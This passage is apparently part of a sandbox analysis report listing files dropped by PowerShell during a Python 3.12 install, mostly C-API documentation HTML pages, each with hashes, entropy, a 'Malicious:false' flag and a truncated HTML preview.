                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Supporting Cyclic Garbage Collection" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/gcsupport.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python.s support for detecting and collecting garbage which involves circular references requires support from object types which are .containers. for other objects which may also be containers. Ty..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python.s support for detecting and c

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\gen.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1305), with CRLF line terminators
                              Category:dropped
                              Size (bytes):19443
                              Entropy (8bit):4.887269112763904
                              Encrypted:false
                              SSDEEP:
                              MD5:7B4208B7497C5414C02DA91293AD4DC2
                              SHA1:5D3B643E555E8C35835B47B0A04BFE55DB13C583
                              SHA-256:663AD78D1DAAE753E7C93E348DD86435BA901B285ECB2D81AF163BAF0CF955FF
                              SHA-512:FAAA04017C4701E5A6A3F86349EA6B8CA75DD215172D68770A6D13926CEE35825100A48B87B575E82E222BF42698574CEE01D02C43D2B7B8C090A5B8E7E4B871
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Generator Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/gen.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Generator objects are what Python uses to implement generator iterators. They are normally created by iterating over a function that yields values, rather than explicitly calling PyGen_New() or PyG..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Generator objects are what Python uses to implement generator iterato

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\hash.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (536), with CRLF line terminators
                              Category:dropped
                              Size (bytes):17190
                              Entropy (8bit):4.883324490997966
                              Encrypted:false
                              SSDEEP:
                              MD5:4AE42ADEF8F2AF6FB296110969F586F9
                              SHA1:7459E1DC05EC49687EB35047CA84EA719E30BC36
                              SHA-256:2BDFAAB91AF2D0A51C46936D107DD30885176D6971E069BFC5A3CEFBC6982CFD
                              SHA-512:72825F93A41B253C97CC7F651890E083DDAB55C2A7B062888BBF99A9AA88131A3400B2815A9F5D4909FFDA4B81BA4DF9A3DFA30F6E5078B012834677D77C4752
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="PyHash API" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/hash.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also the PyTypeObject.tp_hash member." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also the PyTypeObject.tp_hash member." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>PyHash API &#8212; Python

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\import.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1720), with CRLF line terminators
                              Category:dropped
                              Size (bytes):67467
                              Entropy (8bit):4.85299626927617
                              Encrypted:false
                              SSDEEP:
                              MD5:0712766986B78D381D34B8021D93B7FE
                              SHA1:D7BB2D46C4A6BD851FC8D01B3459DAF3DE2DAEC7
                              SHA-256:CDC979588A09B5E96D8619B604A956BC84BB62A0216E341B273B31F0AFE6F7CD
                              SHA-512:C7A3E84331620C6CBE87669E8BFDF43F9A8811852F817DEA41A50FDD7D9ACAA2C4F970320897821CD144CB87E45CB50F685AFED9D0A10E47D1D321BFCADFB430
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Importing Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/import.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Importing Modules &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\index.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                              Category:dropped
                              Size (bytes):26042
                              Entropy (8bit):4.882844562211637
                              Encrypted:false
                              SSDEEP:
                              MD5:01F9F6A10A3E316293E9EF2BE36B2977
                              SHA1:8274BA10F8C4013738B92B192F7CC92592D3B470
                              SHA-256:2194919538FAC4D36A0FE09D2A8F2C2A595AC7B97E00AD27AB0839DC0E77A16C
                              SHA-512:850F7E723C8557F60976A718E7887CD3BD2D94787B9AEE5A66AECD32BDCBFD324300EA672A3753E515D2C719BA6CF051E75A5BB71AD3BF9521AE8B76A6AB1FC1
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python/C API Reference Manual" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This manual documents the API used by C and C++ programmers who want to write extension modules or embed Python. It is a companion to Extending and Embedding the Python Interpreter, which describes..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This manual documents the API used by C and C++ program

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\init.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (882), with CRLF line terminators
                              Category:dropped
                              Size (bytes):279279
                              Entropy (8bit):4.890356416578371
                              Encrypted:false
                              SSDEEP:
                              MD5:5335A2D0DD436B3A936BD02C622D5C9E
                              SHA1:5AA19F1E5613E77C7536F35D1A049A72CD6FAD6B
                              SHA-256:315CE2E5E6136DBF1BA4CD5C2A0F4663ED208D825EEF9BDE9D5F3516A99310DD
                              SHA-512:26FF7D1ABEC21EB691A5631EEF195A1834D8DCDD4EBAF712FEE142BE75FFDC8B876F66D889B30FD986D5687B32EA046A83DFD56FD5D6F848A5495CB56A2CB8F4
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Initialization, Finalization, and Threads" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/init.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also Python Initialization Configuration. Before Python Initialization: In an application embedding Python, the Py_Initialize() function must be called before using any other Python/C API funct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also Python Initialization Configuration

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\init_config.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1218), with CRLF line terminators
                              Category:dropped
                              Size (bytes):228040
                              Entropy (8bit):4.84968154443352
                              Encrypted:false
                              SSDEEP:
                              MD5:B352AFA08B6AAD5FA2A57A365A5F58BD
                              SHA1:55E6F710AAB95B5FB65C010A523FA9791DA1801D
                              SHA-256:39711E0FF96C99A885C2E30DFDFB24CED3C3B333164C0D33CA2EAA216459F185
                              SHA-512:9B21E1367D3DF27953A06EA33FE9D1872941DDAE6B081C1338DA74762838C8D005EED64C586790F83A437B1F87D5CCA117A91B84DFC4794684E766ED85372C27
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Python Initialization Configuration" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/init_config.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python can be initialized with Py_InitializeFromConfig() and the PyConfig structure. It can be preinitialized with Py_PreInitialize() and the PyPreConfig structure. There are two kinds of configura..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python can be initialized with Py_Initializ

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\intro.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (626), with CRLF line terminators
                              Category:dropped
                              Size (bytes):106771
                              Entropy (8bit):4.859201129994066
                              Encrypted:false
                              SSDEEP:
                              MD5:A7EAE0AF8AEED9287CD40553A9FCB0B4
                              SHA1:ECB2BF6B24A06BBB530FC9192E13C34E5D104919
                              SHA-256:1CC1227EC4DAA4C12D6D6783A0BD93479F2C65ECF6E22D4DF734D824F576665D
                              SHA-512:1A6943D815B4F5A5043CB92C51D8AD31DEAF13C4FBCE962E8A9DEFBFAB2AEA41DEDA61D5E3E25B24DD1BEAEC51FD0444A3DF21285BD61E868FAAB96CF9C4FBF0
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Introduction" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/intro.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="The Application Programmer.s Interface to Python gives C and C++ programmers access to the Python interpreter at a variety of levels. The API is equally usable from C++, but for brevity it is gener..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="The Application Programmer.s Interface to Python gives C and C++ pro

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\iter.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1269), with CRLF line terminators
                              Category:dropped
                              Size (bytes):22462
                              Entropy (8bit):4.867850146969797
                              Encrypted:false
                              SSDEEP:
                              MD5:E3C31E23767226555F438B0D0F105B87
                              SHA1:538FB61B5DA0671ECD91A181A4D9D630127972A7
                              SHA-256:A328EA7B34488C00ED1DBF7F326E3D4719CCD7CFEC7C89C8A04A0BC782A2DCCA
                              SHA-512:AD8B76CE307098B155B47517075F5AF06791F8BB6C1D81A84F521659109602EE5C174C522C06F0AB946BCB89238365BF0ABD2BCECC9922BC4ABC8B77FD8C4629
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterator, the C code should look something like this:" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are two functions specifically for working with iterators. To write a loop which iterates over an iterato

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\iterator.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1016), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20665
                              Entropy (8bit):4.891099591900654
                              Encrypted:false
                              SSDEEP:
                              MD5:1D73062207865B5516A43A0578D7D724
                              SHA1:61EDB1ED38B1DB40840EEE6B6A338FE317EFD5DA
                              SHA-256:5CB407E5E9E7548B280036951503FD7C7E556DEB153206A5866A2264AEBB478D
                              SHA-512:585E9522C74F59EEFFA0494AA68C82137272F6129454AD548D1491123F5E46D3DD3FCF52AE4A8B4806DE1EA1480F0D6E66CDFFC09D860E2A4AFD6852277B08DD
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Iterator Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/iterator.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python provides two general-purpose iterator objects. The first, a sequence iterator, works with an arbitrary sequence supporting the__getitem__() method. The second works with a callable object an..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python provides two general-purpose iterator objects. The first,

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\list.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1315), with CRLF line terminators
                              Category:dropped
                              Size (bytes):38118
                              Entropy (8bit):4.855039623443231
                              Encrypted:false
                              SSDEEP:
                              MD5:64A4967382B9586728095F62947076C9
                              SHA1:08C160C87AF093DB6AA296AA605E573078D6CE07
                              SHA-256:CA8B3F7FA2FEA9133E628038C1DA11A18DAA768AE02EB4AA03C2E8D25C449C4A
                              SHA-512:3BBB50B16CE7F6B0D7A49F329E5D6679089F5A9AE3FC616C7FACC9F49378951447B00963E6EFC87A561566CAB11303C71BA56618EA03B6E18351CD0434447C91
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="List Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/list.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>List Objects &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="stylesheet" type="text/css" href="../_static

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\long.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1093), with CRLF line terminators
                              Category:dropped
                              Size (bytes):72564
                              Entropy (8bit):4.8669890321048666
                              Encrypted:false
                              SSDEEP:
                              MD5:E4052F22EB7520397F2F0CB422DF43E8
                              SHA1:A8B575C2D6D01347C134DFC759A33EA3B4FE08DF
                              SHA-256:9EB760BD665F2F475C64AE01161C003D10E141B823704616ED0C283A00886EFC
                              SHA-512:FF1FD1D746CBF347948B7599970127A52A156029A3C22B1145780053D0326675A095DC2F476C9D50180C6CA31E7CD45B758EBAD322F6A86142AF6EF93C658C9B
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Integer Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/long.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="All integers are implemented as .long. integer objects of arbitrary size. On error, most PyLong_As* APIs return(return type)-1 which cannot be distinguished from a number. Use PyErr_Occurred() to d..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="All integers are implemented as .long. integer objects of arbi

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\mapping.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1138), with CRLF line terminators
                              Category:dropped
                              Size (bytes):32689
                              Entropy (8bit):4.876693781272095
                              Encrypted:false
                              SSDEEP:
                              MD5:5B5A0C20BF99C44DB6DB0B7E5CB2B217
                              SHA1:946218CB5B0EF8CCCB126F76147CCBD0DA15745E
                              SHA-256:0CFB6374AF1AB7F3759A3F387283CEC14878D40F613792D51682F83802CDE039
                              SHA-512:31455CF41F996F7F4A24C30B2EB9D5932868D579A39451C794A50733134B02C1D495D095B016C3D94DE9048F1030DAA9B8886C7A5F1E0885B6FD04B847D2F4C2
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Mapping Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/mapping.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="See also PyObject_GetItem(), PyObject_SetItem() and PyObject_DelItem()." />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\marshal.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (980), with CRLF line terminators
                              Category:dropped
                              Size (bytes):27348
                              Entropy (8bit):4.882288409260469
                              Encrypted:false
                              SSDEEP:
                              MD5:34AE2B3BF34417AB6BCBCDF6D54D2650
                              SHA1:AED9721711F9115E6239A7AEC6984062EF76D485
                              SHA-256:D8ED281E602DC2E3CF261E722D4D0366C7D791D013BE125B29C04A1C0C724126
                              SHA-512:1ADDC73E3394FBF4C2D261A6F6D6119A196A4E22C406BB91E6D7F161B32764F2DCDA5965AC6D71BDC4E18A2254A5491D90051B2FCD556E7006F7248C73FEA97E
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Data marshalling support" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/marshal.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These routines allow C code to work with serialized objects using the same data format as the marshal module. There are functions to write data into the serialization format, and additional functio..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These routines allow C code to work with serialized object

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\memory.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (867), with CRLF line terminators
                              Category:dropped
                              Size (bytes):101591
                              Entropy (8bit):4.904770652791002
                              Encrypted:false
                              SSDEEP:
                              MD5:E7A109EEAEE6A04D2B153ADD299BF0EF
                              SHA1:C5732E0431F612E6A76688C2705E61F88BEB1D29
                              SHA-256:A75E8E0DFE8A657E47FE4EE6478C4DB12BC122167754B7368DFFB2283D40C264
                              SHA-512:397B18447F846E8EB8EE7D84D231B1EAEE1FF9A9F79E8F5DCF7FA2398FDC041CBBEBA57C89AE2408BEDD7D1383E35E7C13962AD329A079AFF1EA5791FBAED7BB
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Memory Management" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memory.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Overview: Memory management in Python involves a private heap containing all Python objects and data structures. The management of this private heap is ensured internally by the Python memory manag..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Overview: Memory management in Python involves a private heap cont

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\memoryview.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1031), with CRLF line terminators
                              Category:dropped
                              Size (bytes):24626
                              Entropy (8bit):4.951601243376123
                              Encrypted:false
                              SSDEEP:
                              MD5:244D809BFB4BFA9ECC9361C29162D13D
                              SHA1:0448CFD6C79901B82B6E8A100DEE779927AF2FDF
                              SHA-256:AB57C79B33B47F78AA31E4A41A8CD5AF5AECAF39485338E32328098E3038240B
                              SHA-512:1DB073C3DD566DB31EC42EAB69461A6CFB506D5CB9E849F46B4B11A0141F89D21D8D213267C59C1C8E2CA4C0006C4C8290FE3A3586CE2CB2EF16A5A4C97E0720
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="MemoryView objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/memoryview.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="A memoryview object exposes the C level buffer interface as a Python object which can then be passed around like any other object."

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\method.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1004), with CRLF line terminators
                              Category:dropped
                              Size (bytes):27464
                              Entropy (8bit):4.912250905283024
                              Encrypted:false
                              SSDEEP:
                              MD5:1CF1AE28A1AE7EB927CE3558A61EB152
                              SHA1:203AEABF6A59396D82C0F52A5D2E945FE58A445D
                              SHA-256:60FB9CA8B9A006068AB1BB14B8D367407479C45D1593BED7CCDB1570A7B7AA71
                              SHA-512:1A54AD79888434202F144E7849A0ADC714BC4614B4992F78CDDA2EF23CD300786019E86A85AD59A98A2D0C056BEE090F3D1C05773F2CA1404327DE2B6C80F57E
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Instance Method Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/method.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="An instance method is a wrapper for a PyCFunction and the new way to bind a PyCFunction to a class object. It replaces the former call PyMethod_New(func, NULL, class). Method Objects: Methods are b..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="An instance method is a wrapper for a PyCFunction and the ne

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\module.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1019), with CRLF line terminators
                              Category:dropped
                              Size (bytes):105105
                              Entropy (8bit):4.873253108646738
                              Encrypted:false
                              SSDEEP:
                              MD5:4102859F18EB7FE49FD3247C6E2D132C
                              SHA1:6F9B9B991025726136C26D626465F70D6354155F
                              SHA-256:46F210E8AF5958292538FBF9CD3A158EFC04AD81A110D47421D5921843C9F4D8
                              SHA-512:206FAD1D1D9296F5B2E9B463AAB58B099AF7C256EE5918CF012382530DB62E8B699EC810EF367E12807B084FCD26A39F3B8F667D5BEB3AF7595E849B37AA4CB3
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Module Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/module.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Initializing C modules: Modules objects are usually created from extension modules (shared libraries which export an initialization function), or compiled-in modules (where the initialization funct..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Initializing C modules: Modules objects are usually created from exte

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\none.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (396), with CRLF line terminators
                              Category:dropped
                              Size (bytes):15351
                              Entropy (8bit):4.859041556775392
                              Encrypted:false
                              SSDEEP:
                              MD5:13B5A9AEB89F18E1ECFEE8EF7D325601
                              SHA1:972EC36277470B4DCFF3FDA5A6A0531B252BE8B2
                              SHA-256:61DE1432B57FB12A5A5B84D8AA9E175C4E8A2A216CA801949AFAD2B68925F76B
                              SHA-512:CEFAF7C7A87FA17E7B6E7B9EDE19BF76A9E7C2611E493303CEB3348A569204EF70123E74CE7074B3638227F774E7F62DF0C215D880C9933D87AE34D8D5225E5F
                              Malicious:false
                              Reputation:unknown
                              Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The None Object" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/none.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Note that the PyTypeObject for None is not directly exposed in the Python/C API. Since None is a singleton, testing for object identity (using== in C) is sufficient. There is no PyNone_Check() func..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Note that the PyTypeObject for None is not directly exposed in the Pyt

                              C:\Users\user\Downloads\Python\Python312\Doc\html\c-api\number.html

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1284), with CRLF line terminators
                              Category:dropped
                              Size (bytes):78877
                              Entropy (8bit):4.814032396933495
                              Encrypted:false
                              SSDEEP:
                              MD5:5340186F78D90746313F4626B2C9609F
                              SHA1:D33204253F9C5DAFFD322D19B978A362B116D7BB
                              SHA-256:18540D4DE6E149F274A359865D7A13BC10ABC27475F8EF4A7892DED61A0D2F51
                              SHA-512:AF2960E2A3589DB72507EAD4ABADE99EE8E1D833587F17F6B2CC209B19B8A4096E18E0CFDAA8CAAC0CF9B8D97AC27F56C1CB11C7B76B5C1AA403B2BF54F05B1A
                              Malicious:false
                              Reputation:unknown
